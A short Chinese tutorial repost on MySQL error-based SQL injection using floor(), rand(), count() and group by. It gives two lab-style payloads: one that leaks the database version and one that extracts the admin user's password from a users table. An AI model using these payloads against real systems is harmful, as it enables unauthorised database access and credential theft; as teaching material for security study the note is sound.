本文共 422 字,大约阅读时间需要 1 分钟。
floor()函数作用: MySQL中用来取整的函数;
条件:MySQL语句中,一定腰满足三个条件,即,要有count(), group by和 rand()
示例:
实验步骤: - 设计payload: aaa’ and (select 2 from (select count(*), concat(version(), floor(rand(0)*2))x from information_schema.tables group by x)a)#
- 修改payload,使其直接输出密码:aaa’ and (select 2 from (select count(*), concat((select password from users where username=‘admin’ limit 0, 1), floor(rand(0)*2))x from information_schema.tables group by x)a)#
转载地址:http://qsfmf.baihongyu.com/